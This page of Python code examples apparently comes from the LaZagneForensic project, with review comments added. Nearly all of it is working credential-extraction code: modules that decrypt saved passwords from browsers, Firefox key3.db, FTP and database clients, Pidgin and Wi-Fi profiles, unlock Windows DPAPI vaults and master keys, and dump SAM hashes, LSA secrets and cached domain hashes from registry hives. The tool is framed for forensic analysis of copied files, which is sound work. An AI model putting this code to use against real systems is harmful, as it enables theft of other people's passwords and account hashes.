コード例 #1
    def run(self, software_name=None):
        """Read the connection aliases saved in ``SQLAliases23.xml``.

        Returns a list with one dict per ``Bean`` element that had at least one
        of the ``name`` / ``url`` / ``userName`` / ``password`` children, or
        ``None`` when the base path or the XML file does not exist.
        """
        base_dir = build_path(software_name)
        if not base_dir:
            return None

        alias_file = os.path.join(base_dir, u'SQLAliases23.xml')
        if not os.path.exists(alias_file):
            return None

        # XML child tag -> key used in the result dict.
        tag_to_key = {
            'name': 'Name',
            'url': 'URL',
            'userName': 'Login',
            'password': 'Password',
        }

        # NOTE(review): the file content is parsed as-is; the standard-library
        # XML modules are documented as not hardened against maliciously
        # constructed data, which matters if the file comes from an examined
        # system - confirm how callers obtain it.
        document = ET.ElementTree(file=alias_file)

        pwdFound = []
        for bean in document.iter('Bean'):
            entry = {}
            for child in bean:
                key = tag_to_key.get(child.tag)
                if key is not None:
                    # The element text is copied verbatim, password included.
                    entry[key] = child.text
            if entry:
                pwdFound.append(entry)

        return pwdFound
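	def run(self, software_name=None):
		"""
		Read the server entries saved in sitemanager.xml, recentservers.xml and filezilla.xml.

		For every ``Server`` element that has Host, Port and User children, one dict
		with 'Host', 'Port' and 'Login' is produced; 'Password' is added when a Pass
		child exists (base64-decoded when its ``encoding`` attribute says so).

		:return: list of dicts, or None when build_path returns no path.
		"""
		path = build_path(software_name)
		if path:
			pwdFound = []
			for file_name in [u'sitemanager.xml', u'recentservers.xml', u'filezilla.xml']:
				xml_file = os.path.join(path, file_name)
				if not os.path.exists(xml_file):
					continue

				tree = ET.ElementTree(file=xml_file)
				# Query once; fall back to the recent-servers layout when the first path is empty.
				servers = tree.findall('Servers/Server') or tree.findall('RecentServers/Server')

				for server in servers:
					host = server.find('Host')
					port = server.find('Port')
					login = server.find('User')
					password = server.find('Pass')

					# An incomplete entry used to fall through with `values` either unbound
					# (NameError on the first server) or still pointing at the previous
					# server's dict, so a password could be recorded against the wrong host
					# and the same dict appended twice. Skip such entries instead.
					if host is None or port is None or login is None:
						continue

					values = {
						'Host': host.text,
						'Port': port.text,
						'Login': login.text,
					}

					if password is not None:
						# Only decode when there is text to decode; b64decode(None) raises.
						if password.attrib.get('encoding') == 'base64' and password.text:
							values['Password'] = base64.b64decode(password.text)
						else:
							values['Password'] = password.text

					pwdFound.append(values)

			return pwdFound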
コード例 #3
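    def run(self, software_name=None):
        """Parse ``Ftplist.txt`` into one dict per line.

        Each line is a ``;``-separated list of ``key=value`` fields. Name,
        Server, Port and User are copied; a Password value other than '0' or
        '1' is passed through ``self.decode``.

        Returns the list of dicts, or ``None`` when the base path or the file
        does not exist.
        """
        path = build_path(software_name)
        if path:
            filepath = os.path.join(path, u'Ftplist.txt')
            if os.path.exists(filepath):
                # Field name in the file -> key used in the result dict.
                field_to_key = {
                    'Name': 'Name',
                    'Server': 'Host',
                    'Port': 'Port',
                    'User': 'Login',
                }
                pwdFound = []
                # The context manager closes the handle, which was left open before.
                with open(filepath, 'r') as f:
                    for line in f:
                        values = {}
                        for field in line.split(';'):
                            parts = field.split('=')
                            if len(parts) < 2:
                                # Token without '=' (blank line, trailing ';'):
                                # indexing parts[1] would raise IndexError.
                                continue
                            if parts[0] in field_to_key:
                                values[field_to_key[parts[0]]] = parts[1]
                            elif parts[0] == 'Password':
                                if parts[1] != '1' and parts[1] != '0':
                                    values['Password'] = self.decode(parts[1])

                        # used to save the password if it is an anonymous authentication
                        # .get(): a line without a User field has no 'Login' key, and a
                        # plain lookup aborted the whole run with KeyError.
                        if values.get('Login') == 'anonymous' and 'Password' not in values:
                            values['Password'] = '******'

                        # Lines that yielded nothing are not reported.
                        if values:
                            pwdFound.append(values)

                return pwdFound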
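	def run(self, software_name=None):
		"""
		Walk the profile directories and decrypt the saved logins of each one.

		For every profile, self.cookie_enum and self.export_history are called first.
		When self.decrypt_passwords is set, the profile's 'Login Data' SQLite file is
		opened and each password_value is passed to constant.user_dpapi.decrypt_blob.

		NOTE(review): no return statement is visible in this listing, so pwdFound is
		built but not handed back - confirm whether the listing is truncated.
		"""
		path = build_path(software_name)
		if path:
			pwdFound = []
			pwdNotDecryptable = 0
			pwdNotSaved = 0
			for profile in os.listdir(path):

				# Cookie and history steps run for every profile, before the password step
				self.cookie_enum(path, profile)
				self.export_history(path, profile)

				# Password Methods
				if not self.decrypt_passwords:
					continue

				database_path = os.path.join(path, profile, u'Login Data')
				if not os.path.exists(database_path):
					print_debug('DEBUG', u'User database not found: {database_path}'.format(database_path=database_path))
					continue
				print_debug('DEBUG', u'User database found: {database_path}'.format(database_path=database_path))

				# Connect to the Database
				try:
					conn = sqlite3.connect(database_path)
					cursor = conn.cursor()
				except Exception:
					print_debug('ERROR', u'An error occured opening the database file')
					print_debug('DEBUG', traceback.format_exc())
					continue

				# try/finally: the connection is closed even when the query raises
				# (for example when the file has no `logins` table).
				try:
					# Get the results
					cursor.execute('SELECT action_url, username_value, password_value, blacklisted_by_user FROM logins')
					for result in cursor.fetchall():
						try:
							# Decrypt the Password
							password = constant.user_dpapi.decrypt_blob(result[2])
							if password:
								pwdFound.append(
									{
										'URL': result[0],
										'Login': result[1],
										'Password': password,
									}
								)
							# `== 1`, not `is 1`: identity comparison on an int only works
							# by accident of the interpreter's small-integer caching.
							elif result[3] == 1:
								pwdNotSaved += 1
								print_debug('WARNING', u'Blacklisted by User: Site: {url}'.format(url=result[0]))
							else:
								pwdNotDecryptable += 1
								print_debug('WARNING', u"Couldn't decrypt: Site: {0}, User: {1}".format(result[0], result[1]))
						except Exception:
							print_debug('DEBUG', traceback.format_exc())
				finally:
					conn.close()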
コード例 #5
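	def run(self, software_name=None):
		"""
		Read the cached credential files found under the software path.

		In each file the value for a key is taken from the second line after the
		line that starts with that key. The keys are looked up in file order:
		'password', then 'svn:realmstring', then 'username'. The password value is
		base64-decoded and passed to constant.user_dpapi.decrypt_blob.

		:return: list of dicts with 'URL', 'Login' and 'Password'; None when build_path gives no path.
		"""
		def _value_after(lines, key):
			# Consume `lines` until the second line after the one starting with `key`
			# and return it without its newline; '' when the key is never seen.
			countdown = 0
			for line in lines:
				if countdown == -1:
					return line.replace('\n', '')
				if line.startswith(key):
					countdown = -3
				countdown += 1
			return ''

		path = build_path(software_name)
		if path:
			pwdFound = []
			for root, dirs, files in os.walk(path):
				for name_file in files:
					# Join with the directory being walked. os.walk also descends into
					# sub-directories, and joining with the top-level path made open()
					# fail (or open a different file) for anything found below it.
					# The context manager closes the handle, which was left open before.
					with open(os.path.join(root, name_file), 'r') as f:
						# All three lookups share one iterator, so each continues where
						# the previous one stopped.
						result = _value_after(f, 'password')
						url = _value_after(f, 'svn:realmstring')
						username = _value_after(f, 'username')

					if result:
						try:
							password = constant.user_dpapi.decrypt_blob(base64.b64decode(result))
							pwdFound.append(
								{
									'URL': url,
									'Login': username,
									'Password': str(password),
								}
							)
						except Exception:
							# Best effort: a value that cannot be decoded or decrypted is
							# skipped. Narrowed from a bare except so that
							# KeyboardInterrupt / SystemExit are no longer swallowed.
							pass
			return pwdFound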
コード例 #6
ファイル: mozilla.py プロジェクト: tekk/LaZagneForensic
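	def run(self, software_name=None):
		"""
		Decrypt the logins stored in every profile directory under the installation path.

		For each profile: key3.db is read with self.readBsddb, the stored entries are
		fetched with self.get_database, the master password is checked with
		self.is_masterpassword_correct (and searched for with self.found_masterpassword
		when no global salt comes back), then each login / password pair is
		base64-decoded, ASN.1-decoded and decrypted with 3DES in CBC mode.

		:return: list of dicts with 'URL', 'Login' and 'Password'; None when build_path gives no path.
		"""
		pwdFound = []

		# Get the installation path
		path = build_path(software_name)
		if path:
			for profile in os.listdir(path):
				p = os.path.join(path, profile)
				print_debug('INFO', u'Profile path found: {profile}'.format(profile=p))
				key3_path = os.path.join(p, u'key3.db')
				if not os.path.exists(key3_path):
					# Log the path that was looked for. self.key3 is only assigned below,
					# so formatting it here printed whatever an earlier profile left in
					# it (or failed if the attribute did not exist yet).
					print_debug('WARNING', u'key3 file not found: {key3_file}'.format(key3_file=key3_path))
					continue

				self.key3 = self.readBsddb(key3_path)
				if not self.key3:
					continue

				credentials = self.get_database(p)
				if credentials:

					(globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct()

					# Find masterpassword if set
					if not globalSalt:
						print_debug('WARNING', u'Master Password is used !')
						masterPassword = self.found_masterpassword()
						if not masterPassword:
							continue

					# Get user secret key
					key = self.extractSecretKey(globalSalt, masterPassword, entrySalt)

					# Everything is ready to decrypt password
					for host, user, passw in credentials:

						# Login: the IV and the ciphertext are read from fixed positions
						# of the decoded ASN.1 structure.
						loginASN1 = decoder.decode(b64decode(user))
						iv = loginASN1[0][1][1].asOctets()
						ciphertext = loginASN1[0][2].asOctets()
						login = DES3.new(key, DES3.MODE_CBC, iv).decrypt(ciphertext)

						# Password: same layout as the login field
						passwdASN1 = decoder.decode(b64decode(passw))
						iv = passwdASN1[0][1][1].asOctets()
						ciphertext = passwdASN1[0][2].asOctets()
						password = DES3.new(key, DES3.MODE_CBC, iv).decrypt(ciphertext)

						pwdFound.append(
							{
								'URL': host,
								'Login': self.remove_padding(login),
								'Password': self.remove_padding(password),
							}
						)

			return pwdFound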
コード例 #7
    def run(self, software_name=None):
        """Decrypt every file in the ``Roaming/Credentials`` folder of the DPAPI path.

        ``software_name`` is accepted but not used; the base path is always
        ``build_path('DPAPI')``. Returns the truthy results of ``decrypt_cred``
        (an empty list when the path or the folder is missing).
        """
        pwdFound = []

        base_dir = build_path('DPAPI')
        if not base_dir:
            return pwdFound

        creds_directory = os.path.join(base_dir, u'Roaming', u'Credentials')
        if not os.path.exists(creds_directory):
            return pwdFound

        # NOTE(review): constant.user_dpapi is used without a None check here -
        # confirm it is always initialised before this runs.
        for entry in os.listdir(creds_directory):
            decrypted = constant.user_dpapi.decrypt_cred(
                os.path.join(creds_directory, entry))
            if decrypted:
                pwdFound.append(decrypted)

        return pwdFound
コード例 #8
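    def run(self, software_name=None):
        """Read the database connections saved in ``dbvis.xml``.

        One dict is built per ``Databases/Database`` element, with whichever of
        'Name', 'Login', 'Password' (via ``self.decrypt``), 'Driver', 'Host',
        'Port' and 'SID' could be read.

        Returns the list of dicts, or ``None`` when the base path or the file
        does not exist.
        """
        path = build_path(software_name)
        if path:
            xml_file = os.path.join(path, u'dbvis.xml')
            if os.path.exists(xml_file):
                tree = ET.ElementTree(file=xml_file)

                # UrlVariableName attribute -> key used in the result dict.
                url_variable_keys = {'Server': 'Host', 'Port': 'Port', 'SID': 'SID'}

                pwdFound = []
                for e in tree.findall('Databases/Database'):
                    values = {}

                    # Explicit None checks replace the bare `except: pass` blocks
                    # that only existed to absorb a missing element.
                    alias = e.find('Alias')
                    if alias is not None:
                        values['Name'] = alias.text

                    userid = e.find('Userid')
                    if userid is not None:
                        values['Login'] = userid.text

                    ciphered = e.find('Password')
                    if ciphered is not None:
                        try:
                            values['Password'] = self.decrypt(ciphered.text)
                        except Exception:
                            # Best effort: the entry is kept without a password
                            # when the stored value cannot be decrypted.
                            pass

                    driver = e.find('UrlVariables//Driver')
                    if driver is not None and driver.text is not None:
                        values['Driver'] = driver.text.strip()

                    url_variables = e.find('UrlVariables')
                    if url_variables is not None:
                        # Iterate the elements directly. Element.getchildren() was
                        # removed in Python 3.9, and the AttributeError it raised
                        # there was swallowed, silently dropping Host/Port/SID.
                        for driver_node in url_variables:
                            for variable in driver_node:
                                key = url_variable_keys.get(
                                    variable.attrib.get('UrlVariableName'))
                                if key is None:
                                    continue
                                try:
                                    values[key] = str(variable.text)
                                except UnicodeError:
                                    # str() of non-ASCII text fails on Python 2;
                                    # skip that single value, keep the rest.
                                    pass

                    if values:
                        pwdFound.append(values)

                return pwdFound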
    def run(self, software_name=None):
        """Dump the hashes held in the SYSTEM and SAM hive files.

        ``software_name`` is accepted but not used; the hive directory is
        always ``build_path('Hives')``. Returns ``['__Hashdump__', hashes]``
        when ``dump_file_hashes`` yields something, otherwise ``[]``.
        """
        hive_dir = build_path('Hives')
        if not hive_dir:
            return []

        system = os.path.join(hive_dir, 'SYSTEM')
        sam = os.path.join(hive_dir, 'SAM')

        # Only existence is checked here, not that the paths are regular files.
        if not (os.path.exists(system) and os.path.exists(sam)):
            return []

        hashes = dump_file_hashes(system, sam)
        return ['__Hashdump__', hashes] if hashes else []
コード例 #10
ファイル: lsa_secrets.py プロジェクト: zshell/LaZagneForensic
	def run(self, software_name=None):
		"""
		Read the LSA secrets from the SYSTEM and SECURITY hive files.

		software_name is accepted but not used; the hive directory is always
		build_path('Hives').

		:return: ['__LSASecrets__', secrets] when get_file_secrets returns something, else [].
		"""
		hive_dir = build_path('Hives')
		if not hive_dir:
			return []

		system = os.path.join(hive_dir, 'SYSTEM')
		security = os.path.join(hive_dir, 'SECURITY')

		# Both hives must exist and be regular files before they are parsed.
		for hive in (system, security):
			if not (os.path.exists(hive) and os.path.isfile(hive)):
				return []

		secrets = get_file_secrets(system, security, True)
		if secrets:
			return ['__LSASecrets__', secrets]
		return []
コード例 #11
    def run(self, software_name=None):
        """Dump the cached domain hashes from the SYSTEM and SECURITY hives.

        ``software_name`` is accepted but not used; the hive directory is
        always ``build_path('Hives')``. Returns ``['__MSCache__', hashes]``
        when ``dump_file_hashes`` yields something, otherwise ``[]``.
        """
        pwdFound = []

        hive_dir = build_path('Hives')
        if hive_dir:
            system = os.path.join(hive_dir, 'SYSTEM')
            security = os.path.join(hive_dir, 'SECURITY')

            # Each hive has to be present and a regular file.
            system_ok = os.path.exists(system) and os.path.isfile(system)
            security_ok = os.path.exists(security) and os.path.isfile(security)

            if system_ok and security_ok:
                hashes = dump_file_hashes(system, security, True)
                if hashes:
                    pwdFound = ['__MSCache__', hashes]

        return pwdFound
	def run(self, software_name=None):
		"""
		Parse the first connection file that exists and return its credentials.

		Every entry of self.paths is tried first as path/filename; when none of
		those exists, every entry is tried again as path/directory/filename.

		:return: the result of self.parse_json for the first file found (per the
			original docstring, a list with one dict per connection); None when
			there is no path or no file.
		"""
		base_dir = build_path(software_name)
		if not base_dir:
			return None

		# First pass: file directly under the base directory.
		for entry in self.paths:
			candidate = os.path.join(base_dir, entry['filename'])
			if os.path.exists(candidate):
				return self.parse_json(candidate)

		# Second pass: file inside the entry's own sub-directory.
		for entry in self.paths:
			candidate = os.path.join(base_dir, entry['directory'], entry['filename'])
			if os.path.exists(candidate):
				return self.parse_json(candidate)

		return None
コード例 #13
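    def run(self, software_name=None):
        """Decrypt the saved logins of every profile directory under the path.

        For each profile the 'Login Data' SQLite file is opened, the ``logins``
        table is read, and each ``password_value`` is passed to
        ``constant.user_dpapi.decrypt_blob``.

        NOTE(review): no return statement is visible in this listing, so
        ``pwdFound`` is built but not handed back - confirm whether the
        listing is truncated.
        """
        path = build_path(software_name)
        if path:
            pwdFound = []
            for profile in os.listdir(path):
                database_path = os.path.join(path, profile, u'Login Data')
                if not os.path.exists(database_path):
                    print_debug(
                        'DEBUG',
                        u'User database not found: {database_path}'.format(
                            database_path=database_path))
                    continue
                print_debug(
                    'DEBUG',
                    u'User database found: {database_path}'.format(
                        database_path=database_path))

                # Connect to the Database
                try:
                    conn = sqlite3.connect(database_path)
                    cursor = conn.cursor()
                except Exception:
                    print_debug('ERROR',
                                u'An error occured opening the database file')
                    print_debug('DEBUG', traceback.format_exc())
                    continue

                # try/finally: the connection is closed even when the query
                # raises (for example when the file has no `logins` table).
                try:
                    # Get the results
                    cursor.execute(
                        'SELECT action_url, username_value, password_value FROM logins'
                    )
                    for result in cursor.fetchall():
                        try:
                            # Decrypt the Password
                            password = constant.user_dpapi.decrypt_blob(result[2])
                            if password:
                                pwdFound.append({
                                    'URL': result[0],
                                    'Login': result[1],
                                    'Password': password
                                })
                        except Exception:
                            print_debug('DEBUG', traceback.format_exc())
                finally:
                    conn.close()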
コード例 #14
    def run(self, software_name=None):
        """Decrypt every vault directory found under the 'Vault_system' path.

        ``software_name`` is accepted but not used. ``constant.user_dpapi`` is
        used when it is set, otherwise a new ``Decrypt_DPAPI`` is created.
        Returns the concatenated results of ``decrypt_system_vault``.
        """
        pwdFound = []

        vaults_directory = build_path('Vault_system')
        if not vaults_directory:
            return pwdFound

        dpapi = constant.user_dpapi
        if dpapi is None:
            dpapi = Decrypt_DPAPI()
        if not dpapi:
            return pwdFound

        for entry in os.listdir(vaults_directory):
            vault_directory = os.path.join(vaults_directory, entry)
            try:
                result = dpapi.decrypt_system_vault(vault_directory)
                if result:
                    pwdFound += result
            except:
                # Catches everything, so one unreadable vault does not stop
                # the loop; the traceback goes to the debug output.
                print_debug('DEBUG', traceback.format_exc())

        return pwdFound
コード例 #15
ファイル: vault.py プロジェクト: zshell/LaZagneForensic
    def run(self, software_name=None):
        """Decrypt every vault directory found under ``Local/Vault`` of the DPAPI path.

        ``software_name`` is accepted but not used; the base path is always
        ``build_path('DPAPI')``. Returns the concatenated results of
        ``constant.user_dpapi.decrypt_vault``.
        """
        pwdFound = []

        base_dir = build_path('DPAPI')
        if not base_dir:
            return pwdFound

        vaults_directory = os.path.join(base_dir, u'Local', u'Vault')
        if not os.path.exists(vaults_directory):
            return pwdFound

        for entry in os.listdir(vaults_directory):
            vault_directory = os.path.join(vaults_directory, entry)
            try:
                # A None constant.user_dpapi raises here and is logged below,
                # once per vault directory.
                result = constant.user_dpapi.decrypt_vault(vault_directory)
                if result:
                    pwdFound += result
            except:
                # Catches everything, so one unreadable vault does not stop
                # the loop; the traceback goes to the debug output.
                print_debug('DEBUG', traceback.format_exc())

        return pwdFound
コード例 #16
    def run(self, software_name=None):
        """
        Decrypt the saved logins of every profile directory under the path.

        For each profile a key is fetched with self.get_key; when one is found,
        every (user, passw, url) triple from self.getLoginData is decrypted with
        self.decrypt, using item 1 of each field as the IV and item 2 as the
        ciphertext.

        Returns the list of dicts ('URL', 'Login', 'Password'), or None when
        build_path gives no path.
        """
        pwdFound = []

        root_dir = build_path(software_name)
        if not root_dir:
            return None

        for entry in os.listdir(root_dir):
            if entry == '.DS_Store':
                continue

            profile = os.path.join(root_dir, entry)
            print_debug(
                'INFO',
                u'Profile path found: {profile}'.format(profile=profile))

            key = self.get_key(profile)
            if not key:
                continue

            for user, passw, url in self.getLoginData(profile):
                try:
                    login = self.decrypt(key=key, iv=user[1], ciphertext=user[2])
                    secret = self.decrypt(key=key, iv=passw[1], ciphertext=passw[2])
                    pwdFound.append({
                        'URL': url,
                        'Login': login,
                        'Password': secret,
                    })
                except Exception as e:
                    # One undecryptable entry is logged and skipped.
                    print_debug(
                        'DEBUG',
                        u'An error occured decrypting the password: {error}'
                        .format(error=e))

        return pwdFound
コード例 #17
ファイル: pidgin.py プロジェクト: zshell/LaZagneForensic
    def run(self, software_name=None):
        """Read the accounts saved in ``accounts.xml``.

        Returns one dict ('Login', 'Password') per ``account`` element that has
        both a ``name`` and a ``password`` child, or ``None`` when the base
        path or the file does not exist.
        """
        base_dir = build_path(software_name)
        if not base_dir:
            return None

        account_file = os.path.join(base_dir, u'accounts.xml')
        if not os.path.exists(account_file):
            return None

        accounts = ET.ElementTree(file=account_file).getroot().findall('account')

        pwdFound = []
        for account in accounts:
            name = account.find('name')
            password = account.find('password')
            if name is None or password is None:
                continue
            # The password text is taken as stored; no decryption step here.
            pwdFound.append({
                'Login': name.text,
                'Password': password.text
            })
        return pwdFound
コード例 #18
	def run(self, software_name=None):
		"""
		Read the connections saved in connections.xml and return one dict per Reference element.

		The passphrase is fetched first with self.get_passphrase; nothing is read
		without it. connections.xml is looked for directly under the path, then in
		path/system*/o.jdeveloper.db.connection*/.

		:return: list of dicts; None when the path, the passphrase or the XML file is missing.
		"""
		path = build_path(software_name)
		if path:
			self._passphrase = self.get_passphrase(path)
			if self._passphrase:
				# NOTE(review): the passphrase itself is written to the INFO output
				# here, so it ends up wherever that output is stored.
				print_debug('INFO', 'Passphrase found: {passphrase}'.format(passphrase=self._passphrase))
				xml_name = u'connections.xml'
				xml_file = None

				if os.path.exists(os.path.join(path, xml_name)):
					xml_file = os.path.join(path, xml_name)
				else:
					for p in os.listdir(path):
						if p.startswith('system'):
							new_directory = os.path.join(path, p)

							for pp in os.listdir(new_directory):
								if pp.startswith(u'o.jdeveloper.db.connection'):
									if os.path.exists(os.path.join(new_directory, pp, xml_name)):
										xml_file = os.path.join(new_directory, pp, xml_name)
									# Stops at the first matching directory name, whether or
									# not it contained connections.xml.
									break
				
				if xml_file:
					wanted_value 	= ['sid', 'port', 'hostname', 'user', 'password', 'ConnName', 'customUrl', 'SavePassword', 'driver']
					# NOTE(review): 'user', 'password' and 'SavePassword' all map to
					# '******' in this listing - this looks like masking applied to the
					# page; confirm against the upstream file. As written, the three
					# values share one key (the last one read wins) and `name` never
					# equals 'Password', so the self.decrypt branch below is not reached.
					renamed_value 	= {'sid': 'SID', 'port': 'Port', 'hostname': 'Host', 'user': '******', 'password': '******', 'ConnName': 'Name', 'customUrl': 'URL', 'SavePassword': '******', 'driver': 'Driver'}
					tree 			= ET.ElementTree(file=xml_file)
					
					pwdFound = []
					for e in tree.findall('Reference'):
						values = {}
						for ee in e.findall('RefAddresses/StringRefAddr'):
							# A StringRefAddr without an addrType attribute raises KeyError,
							# and one without a Contents child raises AttributeError; neither
							# is handled here.
							if ee.attrib['addrType'] in wanted_value and ee.find('Contents').text is not None:
								name 			= renamed_value[ee.attrib['addrType']] 
								# Only the value stored under 'Password' goes through self.decrypt.
								value 			=  ee.find('Contents').text if name != 'Password' else self.decrypt(ee.find('Contents').text)
								values[name] 	= value
						
						# Appended even when empty (no wanted StringRefAddr found).
						pwdFound.append(values)

					return pwdFound
コード例 #19
	def run(self, software_name=None):
		"""
		Read every XML profile below the software path and decrypt its key material.

		For each file found by walking the sub-directories of the path, the profile
		name, the authentication type and the keyMaterial element are read; the key
		material is passed to dpapi.decrypt_wifi_blob.

		:return: list of dicts ('Wifi', 'Authentication', 'Password' as available);
			None when there is no path or no DPAPI object.
		"""
		path = build_path(software_name)
		if not path:
			return None

		pwdFound = []
		dpapi = constant.user_dpapi
		if dpapi is None:
			dpapi = Decrypt_DPAPI()
		if not dpapi:
			return None

		for repository in os.listdir(path):
			wifi_dir = os.path.join(path, repository)
			for current_dir, _, file_names in os.walk(wifi_dir):
				for file_name in file_names:
					# Every file is parsed as XML; a parse error is not caught here.
					profile_root = ET.ElementTree(file=os.path.join(current_dir, file_name)).getroot()

					# Namespace prefix of the root tag, braces included ('' when there is none).
					xmlschema = ''
					if '}' in profile_root.tag:
						xmlschema = profile_root.tag[:profile_root.tag.index('}') + 1]

					values = {}

					name = profile_root.find('{xmlschema}name'.format(xmlschema=xmlschema))
					if name is not None:
						values['Wifi'] = name.text

					authentication = profile_root.find('{xmlschema}MSM/{xmlschema}security/{xmlschema}authEncryption/{xmlschema}authentication'.format(xmlschema=xmlschema))
					if authentication is not None:
						values['Authentication'] = authentication.text

					key_material = profile_root.find('{xmlschema}MSM/{xmlschema}security/{xmlschema}sharedKey/{xmlschema}keyMaterial'.format(xmlschema=xmlschema))
					if key_material is not None:
						values['Password'] = dpapi.decrypt_wifi_blob(key_material.text)

					if values:
						pwdFound.append(values)

		return pwdFound
コード例 #20
    def __init__(self, password=None, pwdhash=None):
        """Load the user and system DPAPI master keys and try to unlock them.

        User part: the first ``S-*`` folder under ``Roaming[/Microsoft]/Protect``
        of the 'DPAPI' path is taken as the SID, its master keys and the
        CREDHIST file are loaded, and ``password`` (or, failing that,
        ``pwdhash``) is tried against them.

        System part: the LSA secrets are read from the SYSTEM and SECURITY
        hives, and the DPAPI_SYSTEM value is tried against the master keys in
        ``Protect/S-1-5-18/User`` of the 'Dpapi_System' path.

        :param password: user password to try, if known
        :param pwdhash: hex-encoded password hash, used only when no password is given
        """
        self.sid = None
        # User master key pool / system master key pool; stay None when not loaded.
        self.umkp = None
        self.smkp = None
        adding_missing_path = u''

        # User Information

        path = build_path('DPAPI')
        # For a 'local' dump an extra '/Microsoft' component is inserted below.
        if constant.dump == 'local':
            adding_missing_path = u'/Microsoft'

        if path:
            protect_folder = os.path.join(
                path,
                u'Roaming{path}/Protect'.format(path=adding_missing_path))
            credhist_file = os.path.join(
                path, u'Roaming{path}/Protect/CREDHIST'.format(
                    path=adding_missing_path))

            if os.path.exists(protect_folder):
                # The first folder whose name starts with 'S-' is used as the SID.
                for folder in os.listdir(protect_folder):
                    if folder.startswith('S-'):
                        self.sid = folder
                        break

                if self.sid:
                    masterkeydir = os.path.join(protect_folder, self.sid)
                    if os.path.exists(masterkeydir):
                        self.umkp = MasterKeyPool()
                        self.umkp.load_directory(masterkeydir)
                        # The CREDHIST path is passed without checking that the file exists.
                        self.umkp.add_credhist_file(sid=self.sid,
                                                    credfile=credhist_file)

                        if password:
                            # NOTE(review): each item yielded by try_credential is
                            # written to the INFO output; what those items contain
                            # is not visible here - confirm they hold no secret.
                            for r in self.umkp.try_credential(
                                    sid=self.sid, password=password):
                                print_debug('INFO', r)

                        elif pwdhash:
                            # str.decode('hex') is Python 2 only.
                            for r in self.umkp.try_credential_hash(
                                    self.sid, pwdhash=pwdhash.decode('hex')):
                                print_debug('INFO', r)

        # System Information

        path = build_path('Hives')
        if path:
            system = os.path.join(path, 'SYSTEM')
            security = os.path.join(path, 'SECURITY')

            if os.path.exists(system) and os.path.exists(security):
                if os.path.isfile(system) and os.path.isfile(security):
                    reg = Regedit()
                    secrets = reg.get_lsa_secrets(security, system)

                    if secrets:
                        # .get() yields None when 'DPAPI_SYSTEM' is absent (assuming
                        # `secrets` behaves like a dict), and the subscript then raises
                        # TypeError; that case is not handled here.
                        dpapi_system = secrets.get('DPAPI_SYSTEM')["CurrVal"]
                        # `path` is reused for the system master key location.
                        path = build_path('Dpapi_System')
                        if path:
                            masterkeydir = os.path.join(
                                path, u'Protect', u'S-1-5-18', u'User')
                            if os.path.exists(masterkeydir):
                                self.smkp = MasterKeyPool()
                                self.smkp.load_directory(masterkeydir)
                                self.smkp.add_system_credential(dpapi_system)
                                for r in self.smkp.try_system_credential():
                                    print_debug('INFO', r)
コード例 #21
ファイル: dpapi.py プロジェクト: zshell/LaZagneForensic
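	def __init__(self, password=None, pwdhash=None):
		"""
		Load the user and system DPAPI master keys and try to unlock them.

		User part: an S-* folder under Roaming[/Microsoft]/Protect of the 'DPAPI'
		path gives the SID; all its master key files are loaded, the key named in the
		Preferred file is also kept in its own pool, CREDHIST is added when present,
		and password (or, failing that, pwdhash) is tried. self.dpapi_ok is set when
		one of them unlocks the pool.

		System part: the LSA secrets are read from the SYSTEM and SECURITY hives and
		the DPAPI_SYSTEM value is tried against Protect/S-1-5-18/User of the
		'Dpapi_System' path.

		:param password: user password to try, if known
		:param pwdhash: hex-encoded password hash, used only when no password is given
		"""
		self.sid = None
		self.preferred_umkp = None
		self.dpapi_ok = False
		self.umkp = None
		self.smkp = None
		self.last_masterkey_file = None
		adding_missing_path = ''

		# -------------------------- User Information --------------------------

		path = build_path('DPAPI')
		# For a 'local' dump an extra '/Microsoft' component is inserted below.
		if constant.dump == 'local':
			adding_missing_path = '/Microsoft'

		if path:
			protect_folder = os.path.join(path, 'Roaming{path}/Protect'.format(path=adding_missing_path))
			if os.path.exists(protect_folder):
				# No break: when several S-* folders exist, the last one listed is kept.
				for folder in os.listdir(protect_folder):
					if folder.startswith('S-'):
						self.sid = folder

				# Without an S-* folder self.sid stays None, and joining it to the
				# path raised instead of leaving the user pool unloaded.
				masterkeydir = os.path.join(protect_folder, self.sid) if self.sid else None
				if masterkeydir and os.path.exists(masterkeydir):
					# user master key pool
					self.umkp = masterkey.MasterKeyPool()

					# load all master key files (not only the one contained on preferred)
					self.umkp.loadDirectory(masterkeydir)

					preferred_file = os.path.join(masterkeydir, 'Preferred')
					if os.path.exists(preferred_file):
						# Context managers close the handles, which were left open before.
						with open(preferred_file, 'rb') as preferred:
							preferred_mk_guid = display_masterkey(preferred)

						# Preferred file contains the GUID of the last masterkey created
						self.last_masterkey_file = os.path.join(masterkeydir, preferred_mk_guid)
						if os.path.exists(self.last_masterkey_file):
							print_debug('DEBUG', 'Last masterkey created: {masterkefile}'.format(masterkefile=self.last_masterkey_file))
							self.preferred_umkp = masterkey.MasterKeyPool()
							with open(self.last_masterkey_file, 'rb') as masterkey_file:
								self.preferred_umkp.addMasterKey(masterkey_file.read())

					credhist_path = os.path.join(path, 'Roaming{path}/Protect/CREDHIST'.format(path=adding_missing_path))
					credhist = credhist_path if os.path.exists(credhist_path) else None

					if credhist:
						self.umkp.addCredhistFile(self.sid, credhist)

					if password:
						if self.umkp.try_credential(self.sid, password):
							self.dpapi_ok = True
						else:
							# NOTE(review): the candidate password is written in clear to
							# the DEBUG output; consider logging only that it failed.
							print_debug('DEBUG', 'Password not correct: {password}'.format(password=password))

					elif pwdhash:
						# str.decode('hex') is Python 2 only.
						if self.umkp.try_credential_hash(self.sid, pwdhash.decode('hex')):
							self.dpapi_ok = True
						else:
							# NOTE(review): same remark as above for the hash value.
							print_debug('DEBUG', 'Hash not correct: {pwdhash}'.format(pwdhash=pwdhash))

		# -------------------------- System Information --------------------------

		path = build_path('Hives')
		if path:
			system = os.path.join(path, 'SYSTEM')
			security = os.path.join(path, 'SECURITY')

			if os.path.exists(system) and os.path.exists(security):
				if os.path.isfile(system) and os.path.isfile(security):
					reg = registry.Regedit()
					secrets = None
					try:
						secrets = reg.get_lsa_secrets(security, system)
					except:
						print_debug('DEBUG', traceback.format_exc())

					# Look the entry up before subscripting it: when DPAPI_SYSTEM is
					# absent, .get() returns None and the subscript raised TypeError
					# out of the constructor.
					dpapi_entry = secrets.get('DPAPI_SYSTEM') if secrets else None
					if dpapi_entry:
						dpapi_system = dpapi_entry["CurrVal"]
						# `path` is reused for the system master key location.
						path = build_path('Dpapi_System')
						if path:
							masterkeydir = os.path.join(path, 'Protect', 'S-1-5-18', 'User')
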